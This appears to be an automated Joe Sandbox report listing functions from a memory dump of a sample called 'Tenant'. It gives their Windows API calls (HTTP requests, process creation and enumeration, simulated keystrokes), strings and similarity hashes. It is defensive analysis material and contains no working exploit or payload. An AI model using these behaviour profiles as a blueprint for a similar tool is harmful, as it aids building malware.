                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                        • String ID: U
                                                                                        • API String ID: 4009187628-3372436214
                                                                                        • Opcode ID: 10ba2d548486d3bb47232ee45e4d6665ad47f28fe61f21387ff5aaf78332a709
                                                                                        • Instruction ID: 9f400bffef8479437999620549adca9b580a5bbb7f45fd155e2ebe714f00bf0d
                                                                                        • Opcode Fuzzy Hash: 10ba2d548486d3bb47232ee45e4d6665ad47f28fe61f21387ff5aaf78332a709
                                                                                        • Instruction Fuzzy Hash: 1371DF31400205EFCF219F64C885AFA7BB5FF9A324F24426AFD565B2A6CB318D41DB60
                                                                                        Function 00B2C634 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00AA29E2: GetWindowLongW.USER32(?,000000EB), ref: 00AA29F3
                                                                                          • Part of subcall function 00AA2714: GetCursorPos.USER32(?), ref: 00AA2727
                                                                                          • Part of subcall function 00AA2714: ScreenToClient.USER32(00B677B0,?), ref: 00AA2744
                                                                                          • Part of subcall function 00AA2714: GetAsyncKeyState.USER32(00000001), ref: 00AA2769
                                                                                          • Part of subcall function 00AA2714: GetAsyncKeyState.USER32(00000002), ref: 00AA2777
                                                                                        • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 00B2C69C
                                                                                        • ImageList_EndDrag.COMCTL32 ref: 00B2C6A2
                                                                                        • ReleaseCapture.USER32 ref: 00B2C6A8
                                                                                        • SetWindowTextW.USER32(?,00000000), ref: 00B2C752
                                                                                        • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00B2C765
                                                                                        • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 00B2C847
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                                        • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                        • API String ID: 1924731296-2107944366
                                                                                        • Opcode ID: b4eac9e176503c2bff890221490e1425fa4af70a76bb1eeea52751723aa50d0c
                                                                                        • Instruction ID: cf5f5623634ac20a2e47f01ad9199a7bfbc78ffc955f2c59335025039a30293e
                                                                                        • Opcode Fuzzy Hash: b4eac9e176503c2bff890221490e1425fa4af70a76bb1eeea52751723aa50d0c
                                                                                        • Instruction Fuzzy Hash: 7B51AA30208304AFD704EF24DC5AF6E7BE5EB88314F108559F959872E2CB71A914CB52
                                                                                        Function 00B120E1 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 134networkCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00B1211C
                                                                                        • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00B12148
                                                                                        • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00B1218A
                                                                                        • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00B1219F
                                                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00B121AC
                                                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00B121DC
                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00B12223
                                                                                          • Part of subcall function 00B12B4F: GetLastError.KERNEL32(?,?,00B11EE3,00000000,00000000,00000001), ref: 00B12B64
                                                                                          • Part of subcall function 00B12B4F: SetEvent.KERNEL32(?,?,00B11EE3,00000000,00000000,00000001), ref: 00B12B79
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                                                        • String ID:
                                                                                        • API String ID: 2603140658-3916222277
                                                                                        • Opcode ID: f4e9e8955fed8b4db2f24bb7080960f30a76325d0e0e49f32df5f6694922b38c
                                                                                        • Instruction ID: b5ac935de81ded75a3dc3a526ec9d58156128a6bb8a534ef92b98e55c9bb3cc7
                                                                                        • Opcode Fuzzy Hash: f4e9e8955fed8b4db2f24bb7080960f30a76325d0e0e49f32df5f6694922b38c
                                                                                        • Instruction Fuzzy Hash: BB416DB1501208BFEB169F50CC89FFF7BACEF08354F504156FA059A151DB70AEA48BA0
                                                                                        Function 00B19330 Relevance: 13.9, APIs: 9, Instructions: 438COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00B30980), ref: 00B19412
                                                                                        • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00B30980), ref: 00B19446
                                                                                        • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00B195C0
                                                                                        • SysFreeString.OLEAUT32(?), ref: 00B195EA
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                                        • String ID:
                                                                                        • API String ID: 560350794-0
                                                                                        • Opcode ID: aab19308140587fda03a0268516bea2abd31c669532e3639c0fe296189a2493f
                                                                                        • Instruction ID: e4778138bd79067f489d6ac8230716867f394a0f420e726d42a883381dc9ac73
                                                                                        • Opcode Fuzzy Hash: aab19308140587fda03a0268516bea2abd31c669532e3639c0fe296189a2493f
                                                                                        • Instruction Fuzzy Hash: A9F12B71A00209EFDB14DF94C894EEEB7B9FF49714F508098F516AB291DB31AE85CB50
                                                                                        Function 00B1FD7D Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00B1FD9E
                                                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00B1FF31
                                                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00B1FF55
                                                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00B1FF95
                                                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00B1FFB7
                                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00B20133
                                                                                        • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00B20165
                                                                                        • CloseHandle.KERNEL32(?), ref: 00B20194
                                                                                        • CloseHandle.KERNEL32(?), ref: 00B2020B
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                                        • String ID:
                                                                                        • API String ID: 4090791747-0
                                                                                        • Opcode ID: cc01f97be41e49a168859914aca5c928238314631dd29f6c0e8b602e17e7ee25
                                                                                        • Instruction ID: afb427132386d587ba9c6c7b2366d61f234132096f9e7a1d76aa714a62a771ba
                                                                                        • Opcode Fuzzy Hash: cc01f97be41e49a168859914aca5c928238314631dd29f6c0e8b602e17e7ee25
                                                                                        • Instruction Fuzzy Hash: 78E1AE316043019FDB14EF24C991B6EBBE5EF89314F1485ADF9899B2A2CB71EC41CB52
                                                                                        Function 00B0527C Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00B04BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00B03B8A,?), ref: 00B04BE0
                                                                                          • Part of subcall function 00B04BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00B03B8A,?), ref: 00B04BF9
                                                                                          • Part of subcall function 00B04FEC: GetFileAttributesW.KERNEL32(?,00B03BFE), ref: 00B04FED
                                                                                        • lstrcmpiW.KERNEL32(?,?), ref: 00B052FB
                                                                                        • _wcscmp.LIBCMT ref: 00B05315
                                                                                        • MoveFileW.KERNEL32(?,?), ref: 00B05330
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                                        • String ID:
                                                                                        • API String ID: 793581249-0
                                                                                        • Opcode ID: eeba59673dd828292a4cc0a418aeb6834a5625d011ab3db107c3972f24d0495e
                                                                                        • Instruction ID: 625e02eaac4a950a0a9cad36b6db1f66b38904cedb1f745d3b2cf1a87dcaed32
                                                                                        • Opcode Fuzzy Hash: eeba59673dd828292a4cc0a418aeb6834a5625d011ab3db107c3972f24d0495e
                                                                                        • Instruction Fuzzy Hash: 195176B24083855BC734DB50D991EDFB7ECEF84340F50495EB589D3192EF34A6888B66
                                                                                        Function 00B28C6A Relevance: 13.7, APIs: 9, Instructions: 168COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00B28D24
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: InvalidateRect
                                                                                        • String ID:
                                                                                        • API String ID: 634782764-0
                                                                                        • Opcode ID: be4f1a479cfe350987a622c9de41886fd3d2bb5ae989842dbee80750525d63ae
                                                                                        • Instruction ID: 66a067abd150127e7e07491a8aba04ab40a09c5d624450bb3bd18296f29f0fda
                                                                                        • Opcode Fuzzy Hash: be4f1a479cfe350987a622c9de41886fd3d2bb5ae989842dbee80750525d63ae
                                                                                        • Instruction Fuzzy Hash: AC51AD30643224BFEF24AB28EC89B9D3BE4EB05350F244595F918EB1E1CF71A9949A50
                                                                                        Function 00AA2F42 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00ADC638
                                                                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00ADC65A
                                                                                        • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00ADC672
                                                                                        • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00ADC690
                                                                                        • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00ADC6B1
                                                                                        • DestroyIcon.USER32(00000000), ref: 00ADC6C0
                                                                                        • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00ADC6DD
                                                                                        • DestroyIcon.USER32(?), ref: 00ADC6EC
                                                                                          • Part of subcall function 00B2AAD4: DeleteObject.GDI32(00000000), ref: 00B2AB0D
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                                                        • String ID:
                                                                                        • API String ID: 2819616528-0
                                                                                        • Opcode ID: 9e5a9e75e7f13b96b09e928615b1e08af4ae02cd058fde542826bb9259428250
                                                                                        • Instruction ID: 60c1e29293240a7b2848e02c325b9866ef437be66dff66e271717dc66e1a51f6
                                                                                        • Opcode Fuzzy Hash: 9e5a9e75e7f13b96b09e928615b1e08af4ae02cd058fde542826bb9259428250
                                                                                        • Instruction Fuzzy Hash: 3351577061020AAFDB24DF28CD55BAE7BB5EF49720F204529F946A72D0DB70EDA0DB50
                                                                                        Function 00AFA226 Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00AFB52D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00AFB54D
                                                                                          • Part of subcall function 00AFB52D: GetCurrentThreadId.KERNEL32 ref: 00AFB554
                                                                                          • Part of subcall function 00AFB52D: AttachThreadInput.USER32(00000000,?,00AFA23B,?,00000001), ref: 00AFB55B
                                                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 00AFA246
                                                                                        • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00AFA263
                                                                                        • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00AFA266
                                                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 00AFA26F
                                                                                        • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00AFA28D
                                                                                        • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00AFA290
                                                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 00AFA299
                                                                                        • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00AFA2B0
                                                                                        • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00AFA2B3
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                        • String ID:
                                                                                        • API String ID: 2014098862-0
                                                                                        • Opcode ID: 6729ee7df7326ff709ae3e4e3a830db21a001174155e983cf957df54f802315c
                                                                                        • Instruction ID: dbc8c21792b4c98cfd893698fa494c83a7be2d26d6141c722fa5434713085ace
                                                                                        • Opcode Fuzzy Hash: 6729ee7df7326ff709ae3e4e3a830db21a001174155e983cf957df54f802315c
                                                                                        • Instruction Fuzzy Hash: 4C1182B1660618BEF6106B609C4AFAA7A2DEF4C751F610415F7546B090CEF25C509AB4
                                                                                        Function 00AF94D9 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00AF915A,00000B00,?,?), ref: 00AF94E2
                                                                                        • HeapAlloc.KERNEL32(00000000,?,00AF915A,00000B00,?,?), ref: 00AF94E9
                                                                                        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00AF915A,00000B00,?,?), ref: 00AF94FE
                                                                                        • GetCurrentProcess.KERNEL32(?,00000000,?,00AF915A,00000B00,?,?), ref: 00AF9506
                                                                                        • DuplicateHandle.KERNEL32(00000000,?,00AF915A,00000B00,?,?), ref: 00AF9509
                                                                                        • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00AF915A,00000B00,?,?), ref: 00AF9519
                                                                                        • GetCurrentProcess.KERNEL32(00AF915A,00000000,?,00AF915A,00000B00,?,?), ref: 00AF9521
                                                                                        • DuplicateHandle.KERNEL32(00000000,?,00AF915A,00000B00,?,?), ref: 00AF9524
                                                                                        • CreateThread.KERNEL32(00000000,00000000,00AF954A,00000000,00000000,00000000), ref: 00AF953E
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                        • String ID:
                                                                                        • API String ID: 1957940570-0
                                                                                        • Opcode ID: 6fe925547df4a2c3a592c90b10c36a8597084808d70c20ef0a708777861ad2b2
                                                                                        • Instruction ID: e512536eba03332f8dd651d5e32744f81b5aa47ec2c3f5e7ca8ce72e5e80a659
                                                                                        • Opcode Fuzzy Hash: 6fe925547df4a2c3a592c90b10c36a8597084808d70c20ef0a708777861ad2b2
                                                                                        • Instruction Fuzzy Hash: 0101CDB5250708BFE750AFA5DC5DF6B7BACEF89711F104411FA05DB1A1CA709804DB20
                                                                                        Function 00B1A20D Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 352COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: NULL Pointer assignment$Not an Object type
                                                                                        • API String ID: 0-572801152
                                                                                        • Opcode ID: 2c192b44ef6239c54df070acd4bbf9d9b9a3cb1d8e78bd153d12d9d736da562c
                                                                                        • Instruction ID: 4fc9264518134ee6a712a32cd442fbd18417f31502180f01b522d29e28ed7c3b
                                                                                        • Opcode Fuzzy Hash: 2c192b44ef6239c54df070acd4bbf9d9b9a3cb1d8e78bd153d12d9d736da562c
                                                                                        • Instruction Fuzzy Hash: 3CC1A171A0121A9FDF10DF98D884BEEB7F5FF58310F5484A9E915AB280E770AD84CB91
                                                                                        Function 00B197FD Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Variant$ClearInit$_memset
                                                                                        • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                        • API String ID: 2862541840-625585964
                                                                                        • Opcode ID: ac2e3a8956996cade0765b0997cca432fcff96c96de62706097b7467ba6a4f8d
                                                                                        • Instruction ID: 9c23d6e8b9a7ed1c2b95bf2f202bff1a30d37bcce262bc1227f3cdaeacaf173c
                                                                                        • Opcode Fuzzy Hash: ac2e3a8956996cade0765b0997cca432fcff96c96de62706097b7467ba6a4f8d
                                                                                        • Instruction Fuzzy Hash: EF918A31A00259ABDF24CFA5C8A4FEEBBF8EF45710F50859DE515AB290D7709984CBA0
                                                                                        Function 00B273A5 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00B27449
                                                                                        • SendMessageW.USER32(?,00001036,00000000,?), ref: 00B2745D
                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00B27477
                                                                                        • _wcscat.LIBCMT ref: 00B274D2
                                                                                        • SendMessageW.USER32(?,00001057,00000000,?), ref: 00B274E9
                                                                                        • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00B27517
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Window_wcscat
                                                                                        • String ID: SysListView32
                                                                                        • API String ID: 307300125-78025650
                                                                                        • Opcode ID: a73d601b6b3e64d0ecdfc398ec99acead57a76d21deea6a551694ce6baf1d215
                                                                                        • Instruction ID: 3b1fa6ce838db2122ca468de4f71ac70b3d34df129063acab5331b02987a8679
                                                                                        • Opcode Fuzzy Hash: a73d601b6b3e64d0ecdfc398ec99acead57a76d21deea6a551694ce6baf1d215
                                                                                        • Instruction Fuzzy Hash: 7341C470544318AFDB21DF64DC85FEEBBE8EF08350F1044AAF958A7291DA719D84CB54
                                                                                        Function 00B1F01C Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00B04148: CreateToolhelp32Snapshot.KERNEL32 ref: 00B0416D
                                                                                          • Part of subcall function 00B04148: Process32FirstW.KERNEL32(00000000,?), ref: 00B0417B
                                                                                          • Part of subcall function 00B04148: FindCloseChangeNotification.KERNEL32(00000000), ref: 00B04245
                                                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00B1F08D
